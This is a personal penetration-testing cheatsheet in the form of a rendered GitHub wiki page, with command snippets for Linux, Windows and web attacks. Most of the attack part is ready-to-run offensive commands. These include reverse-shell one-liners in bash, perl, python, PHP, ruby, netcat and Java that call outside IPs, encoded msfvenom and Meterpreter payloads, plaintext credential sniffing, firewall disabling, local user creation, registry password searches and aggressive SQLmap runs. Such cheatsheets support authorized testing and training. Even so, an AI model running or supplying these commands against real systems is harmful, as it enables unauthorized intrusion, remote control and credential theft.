Permalink
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
440 lines (353 sloc) 13.9 KB
title author permalink layout image categories featured-img header
Pentesting
Matteo Malvica
/pentesting/
post
/assets/images/5.png
wiki
https:/avanzo.github.io/assets/images/header_nero_sito_1200px256px.jpg
image overlay_image image_description overlay_filter cta_label cta_url
https:/avanzo.github.io/assets/images/2.png
https:/avanzo.github.io/assets/images/header_nero_sito_1200px256px.jpg
banner
rgba(0, 0, 0, 0.3)
@avanzo

Pentesting Cheatsheet

An unstructured list of bolts & clamps I have collected over time.

{% include toc.html %}

Linux

Privileges

find all setuid and setgid programs
find / -perm -6000 -print

set file immutable (even root cannot delete it)
chattr +i test.txt

set file append only. Can only add new content, not remove old
chattr +a test.txt

verify immutable flag (plus other flags)
lsattr

revoke to groups and other read+write+execution permission in the current and sub directories
chmod -R go-rwx /*

assigns to all user read+write+execution permission in the current and sub directories
chmod -R a+rx /*

allows file owner to be the only one authorized to delete their files
umask 0000

cat, grep & misc commands

cat all files recursively
find . -name '*.txt' -exec cat {} \;
find . -name '*' -exec ls -asl {} \; 2>/dev/null | grep passwd
find . -name foo -type f -print0 | xargs -0 grep "password"

find a pattern in a file and suppress stderr
grep 'pattern' file 2>/dev/null
grep -s 'pattern' file

Network Scanning

Unicorn UDP scan over tunnel interface (often faster than nmap)
unicornscan -mU -p 161 10.11.1.0/24 -i tap0

Masscan over tunnel
masscan -p1-65500 10.11.1.219 --interface tap0 --router-mac 00-50-56-89-35-90

Traffic Dump

Grab everything between two keywords
tcpdump -i eth0 port 80 -X | sed -n -e '/username/,/=ldap/ p'

Grab user and pass ever plain http
{% highlight text hl_lines="1 3 4" %} tcpdump -i eth0 port http -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20 {% endhighlight %}

SSH Port Forwarding

SSH local port forwarding
Make services on the remote network accessible to your host via a local listener. The service running on the remote host on TCP port 8834 is accessible by connecting to 8834 on the SSH client system.
ssh -L 8834:localhost:8834 user@taget_ip

SSH remote port forwarding
Make services on your local system / local network accessible to the remote host via a remote listener. The SSH server will be able to access TCP port 80 on 172.16.0.99 (a host accessible from the SSH client) by connecting to 127.0.0.1:8000 on the SSH server.
ssh -R 127.0.0.1:8000:172.16.0.99:80 10.0.0.1

Password cracking and wordlists

Crunch Worlist Generator

{% highlight text hl_lines="1 3 4" %} Crunch - Wordlist Generator @ - Lower case alpha characters , - Upper case alpha characters % - Numeric characters ^ - Special characters including space

example:
crunch 8 8 -t ,@@^^%%%

{% endhighlight %}

Custom dictionary from website
cewl -d 2 -m 5 -w docswords.txt http://docs.kali.org

Create wordlist in norwegian using words from Wikipedia {% highlight text hl_lines="1 3 4" %} wget http://download.wikimedia.org/nowiki/latest/nowiki-latest-pages-articles.xml.bz2

bzcat nowiki-latest-pages-articles.xml.bz2 | grep '^[a-zA-Z]' | sed 's/[-_:.,;#@+?{}()&|§!¤%`<>="/]/\ /g'<br> | tr ' ' '\n' | sed 's/[0-9]//g' | sed 's/[^A-Za-z0-9]//g' | sed -e 's/./\L\0/g' ```
```| sed 's/[^abcdefghijklmnopqrstuvwxyzæøå]//g' | sort | uniq | pw-inspector -m1 -M20 > nowiki.lst {% endhighlight %}

Reverse-shell oneliners

bash {% highlight text hl_lines="1 3 4" %} bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 {% endhighlight %} perl {% highlight text hl_lines="1 3 4" %} perl -e 'use Socket;$i="192.168.26.31";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i”);};’ {% endhighlight %}

python
{% highlight text hl_lines="1 3 4" %} python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.26.31",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' {% endhighlight %}

PHP

Reverse Shell
{% highlight text hl_lines="1 3 4" %} php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' {% endhighlight %}
Command backdoor
{% highlight text hl_lines="1 3 4" %} {% endhighlight %}

Ruby
{% highlight text hl_lines="1 3 4" %} ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' {% endhighlight %}

Netcat
{% highlight text hl_lines="1 3 4" %} nc -e /bin/sh 10.0.0.1 1234 {% endhighlight %}

Java
{% highlight text hl_lines="1 3 4" %} r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor() {% endhighlight %}

#Xterm
{% highlight text hl_lines="1 3 4" %} xterm -display 10.0.0.1:1 {% endhighlight %}

SMB

List shares
smbclient -L 1.2.3.4

Connect to share
smbclient \\\\1.2.3.4\\SHARE

Nmap SMB scripts: {% highlight text hl_lines="1 3 4" %} nmap -v -p 139,445 [IP] --script=smb-vuln-conficker.nse nmap -v -p 139,445 [IP] --script=smb-vuln-cve2009-3103.nse nmap -v -p 139,445 [IP] --script=smb-vuln-ms06-025.nse nmap -v -p 139,445 [IP] --script=smb-vuln-ms07-029.nse nmap -v -p 139,445 [IP] --script=smb-vuln-ms08-067.nse nmap -v -p 139,445 [IP] --script=smb-vuln-ms10-054.nse nmap -v -p 139,445 [IP] --script=smb-vuln-ms10-061.nse nmap -v -p 139,445 [IP] --script=smb-vuln-ms17-010.nse nmap -v -p 139,445 [IP] --script=smb-vuln-regsvc-dos.nse {% endhighlight %}

SNMP

{% highlight text hl_lines="1 3 4" %} onesixtyone – c -I {% endhighlight %}

{% highlight text hl_lines="1 3 4" %} snmpwalk -c -v {% endhighlight %}

MSFVenom

Windows

Staged reverse TCP
{% highlight text hl_lines="1 3 4" %} msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe {% endhighlight %}

Stageless (single) reverse TCP {% highlight text hl_lines="1 3 4" %} msfvenom -p windows/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe {% endhighlight %}

Linux

Staged reverse TCP {% highlight text hl_lines="1 3 4" %} msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf >reverse.elf {% endhighlight %}

Stageless (single) reverse TCP {% highlight text hl_lines="1 3 4" %} msfvenom -p linux/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf >reverse.elf {% endhighlight %}

VBA/VBS payload {% highlight text hl_lines="1 3 4" %} msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe {% endhighlight %}

Meterpreter

Meterpreter handler template {% highlight text hl_lines="1 3 4" %} use exploit/multi/handler set PAYLOAD osx/x64/meterpreter/reverse_tcp set LHOST 10.10.1.12 set LPORT 4444 set ExitOnSession false exploit -j -z {% endhighlight %}

Compiling

create object file, and link it
nasm -f elf -o shellcode.o shellcode.nasm
ld -melf_i386 -z execstack -o shellcode shellcode.o

compile in one go
gcc -z execstack -o shellcode shellcode.c

compile windows PE on kali 64bit
x86_64-w64-mingw32-gcc shell.c -o shell.exe

compile windows on kali 32bit
i686-w64-mingw32-gcc shell.c -o shell.exe

generates only ASM from C code
gcc -S -fno-asynchronous-unwind-tables -masm=intel *.c

Binary Exploitation and Reversing

ASLR

disable ASLR system-wide
echo 1 > /proc/sys/kernel/randomize_va_space

disable ASLR on a single bash session, instead of the whole OS
setarch $(uname --machine) --addr-no-randomize bash

PWN TOOLS

convert shellcode to machinecode
print(repr(asm(shellcraft.sh())))

Ret2LibC

finds /bin/sh location inside libc {% highlight text hl_lines="1 3 4" %} (gdb) break main Breakpoint 1 at 0x8048570 (gdb) run Starting program: /root/Desktop/RE/intro_rev_binary_expl/exploitation/examples/hello

Breakpoint 1, 0x08048570 in main () (gdb) find 0xf7dba000,0xf7f8c000,"/bin/sh" 0xf7f35988 1 pattern found. {% endhighlight %}

RADARE2 Cheat sheet
https://github.com/zxgio/r2-cheatsheet/blob/master/r2-cheatsheet.pdf

Windows

Version information

{% highlight text hl_lines="1 3 4" %} WINDOWS NT 5.0 2000 5.1 XP/legacy 5.2 XP64/Server 2003 (R2) 6.0 Vista/Server 2008 6.1 7/Server 2008R2/Home Server 2011 6.2 8/Server 2012 6.3 8.1/Server 2012R2 10.0 10/Server 2016 {% endhighlight %}

Basic enumeration

General system info
systeminfo
Get hostname
hostname
Current user
whoami
Current user, group and permissions
whoami /all
IP and Networking
ipconfig /all
route print
netstat -bano
netsat -r
wingrep
command | findstr /C:"str"
current path
path
run target "executable" with user profile permissiosn for /user:
runas /profile /user:administrator "C:\absolute\path\pcoff.exe"
run code excution in background
START /B process.exe
execute all files in a directory
for %%i in (C:\abs\path\*) do %%i
OR
for /F "usebackq" %i in (`dir /b C:\macros\Day\`) DO %i

User

whoami
net users
list users in current domain
net user /domain
list user info
net user username
add local system user
net user name pass /add
check user's network group membership
net user name setpword
net user /DOMAIN %USERNAME%
check another user's information
net user /domain user
list users in AD group
net group "Domain Users" /domain
list domain local group users
net localgroup "administrators" /domain
net group “Domain Admins” /domain
net group “Enterprise Admins” /domain
net group “Domain Controllers” /domain
NET LOCALGROUP "Remote Desktop Users" trinity /ADD
List password policy for locahost
net accounts
net accounts /domain

Networking

view full ARP table
arp -A
view available network share hosts
net view
view available shares on host
net view \\HOST
Queries NBNS/SMB (SAMBA) and tries to find all hosts in ‘otherdomain’
net view /domain:otherdomain
Lists tasks w/users running those tasks on a remote system
tasklist /V /S computername
Firewall
netsh firewall show state
netsh firewall show config
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
Configure nic to user dhcp
netsh interface ip set address local dhcp
open port (for rdesktop)
netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow
protocol=TCP localport=3389
close port (for rdesktop)
netsh advfirewall firewall add rule name="Block mssql attack ips" dir=in
action=block protocol=TCP localport=1433 remoteip=22.75.175.213

Auto-Start Directories {% highlight text hl_lines="1 3 4" %} Windows NT 6.1,6.0 %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Windows NT 5.2, 5.1, 5,0 %SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp
Windows 9x %SystemDrive%\wmiOWS\Start Menu\Programs\StartUp
Windows NT 4.0, 3.51, 3.50 %SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp
{% endhighlight %}

SMB

map remote hard drive to local path
net use * \\remote_ip\c$ password /u:remote_ip\username
verify shares
net use [sharename]

Powershell

locally use PS to execute command as admin, given admin password {% highlight powershell hl_lines="1 3 4" %} $user = "PC\Administrator"; $password = "test1234"; $pass_string = convertTo-SecureString -AsPlaintext -Force $password; $cred = new-object system.management.automation.pscredential($user, $pass_string); Invoke-Command -ComputerName 127.0.0.1 -Credential $cred -ScriptBlock { type C:/Users/Administrator/Desktop/root.txt ; type C:/Users/h.potter/user.txt } {% endhighlight %}

Privilege Escalation

Full permissions for Everyone or Users? replace (F) with (M) to check for modify rights
{% highlight powershell hl_lines="1 3 4" %} icacls "C:\Program Files*" 2>nul | findstr "(F)" | findstr "Everyone" icacls "C:\Program Files (x86)*" 2>nul | findstr "(F)" | findstr "Everyone" icacls "C:\Program Files*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" icacls "C:\Program Files (x86)*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" {% endhighlight %}

Unquoted service paths? {% highlight powershell hl_lines="1 3 4" %} wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\" 2>nul |findstr /i /v """ {% endhighlight %}

Passwords in registry?
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s


## Web Applications

Parsing

{% highlight text hl_lines="1 3 4" %} curl [IP] -s -L | html2text -width '99' | uniq {% endhighlight %}

Injections

SQLi

SQLmap example
{% highlight text hl_lines="1 3 4" %} sqlmap -m [external url list] --crawl=6 --threads=10 --random-agent --dbms=mysql|mssql|postgresql|orcale --level=5 <br>--risk=3 {% endhighlight %}